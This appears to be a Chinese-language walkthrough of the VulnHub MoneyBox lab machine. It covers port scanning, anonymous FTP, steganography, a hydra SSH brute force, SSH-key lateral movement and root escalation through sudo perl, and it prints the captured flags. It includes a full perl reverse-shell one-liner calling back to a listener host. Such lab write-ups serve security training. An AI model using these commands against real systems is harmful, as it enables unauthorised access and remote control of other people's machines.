Overview| Name | Template |

| — | — |
| Release Date | 2024-11-08 |
| Write-up Author | kill3r |
| Machine Author | kill3r |
| Difficulty | Easy |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/moneybox-1,653/ |

薄弱点1. 图片隐写

Nmap扫描```bash

ports=$(nmap -p- –min-rate=1000 -T4 192.168.56.103 | grep -oE ‘(^[0-9][^/tcp]*)’ | tr ‘\n’ ‘,’)
nmap -p$ports -sV -sC -O 192.168.56.103 -oN nmap.txt

第一行代码使用nmap命令扫描本地主机的所有端口(从1到65535),–min-rate=1000参数表示每秒发送最少1000个包,-T4参数表示设置扫描速度为快速扫描模式。

grep -oE ‘(^[0-9][^/tcp]*)’用于提取输出结果中的端口号,tr ‘\n’ ‘,’用于将提取的端口号按逗号分隔并拼接成一个字符串。

第二行代码使用nmap命令再次扫描指定的端口,-p$ports参数表示扫描之前提取的端口列表,-sV参数表示进行服务版本检测,-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测,-O参数表示进行操作系统版本检测,-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.103 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.103 -oN nmap.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-08 10:02 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00050s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
| 256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_ 256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MoneyBox
MAC Address: 08:00:27:94:02:31 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds

枚举### SMB 枚举> Port: 139 389 445 636

  • enum4linux -a/-A 127.0.0.1
1
$ enum4linux -A <ip>
  • MSF-SMB
1
2
3
4
5
6
# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web> HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

  • Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb````bash

用于识别和分析目标网站的技术栈、CMS(内容管理系统)、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容

┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.103
http://192.168.56.100 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.100], Script[text/javascript]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
- 目录枚举
`dirb http://192.168.56.100`
`dirsearch -u http://192.168.56.100 -r`
`gobuster dir -w ... -u http://192.168.56.100 -x html,php,js,bak`
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# gobuster dir -u "192.168.56.103" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blogs (Status: 301) [Size: 316] [--> http://192.168.56.103/blogs/]
Progress: 37067 / 220561 (16.81%)
Progress: 47178 / 220561 (21.39%)
/server-status (Status: 403) [Size: 279]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
  • 漏洞扫描
1
2
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

wordlist- pass.list

1
3xtr4ctd4t4
  • user.list
1
2
renu
lily

复现过程### Ftp通过nmap扫描得知ftp可以匿名用户登录,用户名密码都是anonymous或者空

发现一张图片进行下载get trytofind.jpg
没发现什么问题,那就转战CTF的思路,看一下是否有隐写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
steghide version 0.5.1
第一个参数必须是以下之一:
embed,--embed 嵌入数据
extract,--extract 提取数据
info,--info 显示有关覆盖文件或隐写文件的信息
info <filename> 显示有关<filename>的信息
encinfo,--encinfo 显示支持的加密算法列表
version,--version 显示版本信息
license,--license 显示steghide的许可证
help,--help 显示使用信息
嵌入选项:
-ef,--embedfile 选择要嵌入的文件
-ef <filename> 嵌入文件<filename>
-cf,--coverfile 选择覆盖文件
-cf <filename> 嵌入到文件<filename>
-p,--passphrase 指定密码短语
-p <passphrase> 使用<passphrase>嵌入数据
-sf,--stegofile 选择隐写文件
-sf <filename> 将结果写入<filename>而不是覆盖文件
-e,--encryption 选择加密参数
-e <a>[<m>]|<m>[<a>] 指定加密算法和/或模式
-e none 在嵌入之前不加密数据
-z,--compress 在嵌入之前压缩数据(默认)
-z <l> 使用级别<l>(1最快速度... 9最佳压缩)
-Z,--dontcompress 在嵌入之前不压缩数据
-K,--nochecksum 不嵌入嵌入数据的crc32校验和
-N,--dontembedname 不嵌入原始文件的名称
-f,--force 覆盖现有文件
-q,--quiet 阻止显示信息消息
-v,--verbose 显示详细信息
提取选项:
-sf,--stegofile 选择隐写文件
-sf <filename> 从<filename>提取数据
-p,--passphrase 指定密码短语
-p <passphrase> 使用<passphrase>提取数据
-xf,--extractfile 选择提取数据的文件名
-xf <filename> 将提取的数据写入<filename>
-f,--force 覆盖现有文件
-q,--quiet 阻止显示信息消息
-v,--verbose 显示详细信息
info命令的选项:
-p,--passphrase 指定密码短语
-p <passphrase> 使用<passphrase>获取嵌入数据的信息
将emb.txt嵌入到cvr.jpg中:steghide embed -cf cvr.jpg -ef emb.txt
从stg.jpg中提取嵌入的数据:steghide extract -sf stg.jpg
1
2
3
┌──(root㉿kill3r)-[/home/kill3r]
└─# steghide extract -sf trytofind.jpg
# 需要密码,路走不通了,看看其他端口

通过拿到的密码进行提取数据
发现一个用户叫做renu提示是你的密码大概是一个弱密码请你更改并重视一下.我们可以爆破一下

SSH```bash

┌──(root㉿kill3r)-[/home/kill3r]
└─# hydra -l renu -P /opt/pwcrack/PasswordDic/用户名和密码/密码/rockyou.txt 192.168.56.103 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-08 10:33:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103 login: renu password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-08 10:34:20

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
密码爆破成功,ssh登录一下,登陆成功后信息收集一波
```bash
renu@MoneyBox:~$ id
uid=1001(renu) gid=1001(renu) groups=1001(renu)
renu@MoneyBox:~$ grep -E '/bin/bash$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
lily:x:1000:1000:lily,,,:/home/lily:/bin/bash
renu:x:1001:1001::/home/renu:/bin/bash
# 发现一个lily用户,但是不知道密码,就暂且放过
renu@MoneyBox:~$ ls
# 发现了user1.txt
Yes...!
You Got it User1 Flag
==> us3r1{F14g:0ku74tbd3777y4}
# 继续分析用户的历史命令
renu@MoneyBox:~$ history
1 cler
2 ls
3 ls -la
4 cd /home
5 ls
6 clear
7 cd
8 ls
9 ls -la
10 exit
11 clear
12 ls
13 ls -la
14 cd /home
15 ls
16 cd lily
17 ls
18 ls -la
19 clear
20 cd
21 clear
22 ssh-keygen -t rsa # 生成了一个rsa密钥
23 clear
24 cd .ssh
25 ls
26 ssh-copy-id lily@192.168.43.80 # 把这个密钥拷贝给力lily用户,刚好我们机器当前也有lily用户后面可以确定一下
27 clear
28 cd
29 cd -
30 ls -l
31 chmod 400 id_rsa
32 ls -l
33 ssh -i id_rsa lily@192.168.43.80
34 clear
35 ssh -i id_rsa lily@192.168.43.80 # 使用密钥文件登录到lily用户
36 cd
37 clear
38 cd .ssh/
39 ls
40 ssh -i id_rsa lily@192.168.43.80
41 su lily # 切换到lily用户
42 clear
43 cd
44 sudo apt install openssh
45 sudo apt update
46 sudo apt install openssh-server # 安装openssh服务端
47 sudo service ssh start
48 sudo service ssh status
49 clear
50 cd /etc/
51 ls
52 cd ssh
53 ls
54 nano ssh_config
55 ls
56 nano sshd_config
57 clear
58 cd
59 ls
60 ls -la
61 chsh bash
62 chsh
63 clear
64 su root
65 clear
66 sudo apt install openssh
67 su root
68 exit

正常情况下,我们当前用户家目录应该有.ssh文件夹,并且有id_rsa.pub文件
没有问题,在去确认lily的家目录中的.ssh文件夹中是否存在authorized_keys文件,并且此文件中的内容如果是renu的密钥,那么证明我们可以通过密钥 ssh lily@127.0.0.1登录到lily用户
内容一样,尝试登录

1
2
3
4
5
6
7
8
9
10
11
12
13
renu@MoneyBox:/home/lily/.ssh$ ssh lily@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$

继续信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag
==> us3r{F14g:tr5827r5wu6nklao}
# 查看权限
lily@MoneyBox:~$ id
uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
# 查看历史命令
lily@MoneyBox:~$ history
1 whoami
2 exit
3 sudo -l
4 clear
5 find / -type f -user lily -perm 4000
6 find / -type f -user lily -perm 4000 2>/dev/null
7 find / -type f -user root -perm 4000 2>/dev/null
8 exit
9 find / -type f -user root -perm 4000 2>/dev/null
10 find / -type f -user lily -perm 4000 2>/dev/null
11 find / -type f -user lily -perm 4000
12 clear
13 find / -type f -user lily -perm 4000 2>/dev/null
14 exit
15 find / -type f -user lily -perm 4000 2>/dev/null
16 find / -type f -root lily -perm 4000 2>/dev/null
17 sudo -l
18 clear
19 exit
20 sudo -l
21 clear
22 exit
23 cd
24 clear
25 su renu
26 clear
27 cd /usr/bin/
28 ls
29 ls ping
30 ls -l ping
31 chmod u+s ping
32 chmod -u+s ping
33 ls -l ping
34 sudo chmod -u+s ping
35 ls -l ping
36 sudo chmod u+r ping
37 sudo chmod u+w ping
38 ls -l ping
39 sudo chmod g-s ping
40 ls -l ping
41 apt update
42 sudo apt update
43 ls
44 ls -l whoami
45 sudo chmod 400 ping
46 sudo chmod u+x ping
47 ls -l ping
48 clear
49 cd
50 cd /etc/
51 nano sudoers
52 sudo nano sudoers
53 cd /usr/bin
54 ls nano
55 ls more
56 clear
57 cd /etc/
58 sudo nano sudoers
59 su root
60 ls
61 ls -la
62 clear
63 ls -la
64 nano user2.txt
65 ls
66 cat user2.txt
67 exit
# 发现了他执行了suid,所以可能存在suid提权
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
# 发现了perl是root权限,并且perl可以反弹Shell
# kali监听
┌──(root㉿kill3r)-[/home/kill3r]
└─# nc -lvvp 6666
listening on [any] 6666 ...
# 使用sudo执行perl
lily@MoneyBox:~$ sudo /usr/bin/perl -e 'use Socket;$i="192.168.56.102";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
lily@MoneyBox:~$ id
# 已经获取到了root权限
# 查看是否存在python,换到全交互式Shell
# which python
# which python3
/usr/bin/python3
#存在python3
# python3 -c 'import pty;pty.spawn("/bin/bash")';
root@MoneyBox:/home/lily# ls
ls
user2.txt
root@MoneyBox:/home/lily# cd /root
cd /root
root@MoneyBox:~# ls -a
. .. .bash_history .bashrc .local .profile .root.txt
root@MoneyBox:~# cat .root.txt
cat .root.txt
Congratulations.......!
You Successfully completed MoneyBox
Finally The Root Flag
==> r00t{H4ckth3p14n3t}
I'm Kirthik-KarvendhanT
It's My First CTF Box
instagram : ____kirthik____
See You Back....
root@MoneyBox:~# history

Web#### 访问靶场,寻找功能点

源代码没有什么的信息,只是提示这是一个非常简单靶场,进行目录扫描一波吧
发现了blogs目录,访问一下,看一下源代码并且继续扫一下目录
目录扫描没有任何结果,查看源代码发现了一句注释:!--the hint is the another secret directory is S3cr3t-T3xt-->
提示了一个目录叫S3cr3t-T3xt,访问一下看一看
发现一个Key,这个Key可能是刚刚图片隐写提取数据的密码

Shell as user1```bash

renu@MoneyBox:~$ cat user1.txt
Yes…!
You Got it User1 Flag
==> us3r1{F14g:0ku74tbd3777y4}

1
2
3
4
5
## Shell as user2```bash
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag
==> us3r{F14g:tr5827r5wu6nklao}

以root身份进入Shell> 保存屏幕截图作为Flag或Proof

1
2
3
4
5
6
7
8
9
10
root@MoneyBox:~# cat .root.txt
cat .root.txt
Congratulations.......!
You Successfully completed MoneyBox
Finally The Root Flag
==> r00t{H4ckth3p14n3t}
I'm Kirthik-KarvendhanT
It's My First CTF Box
instagram : ____kirthik____
See You Back....
许可协议

本文由 kill3r 原创,采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

分享文章

快来参与讨论吧~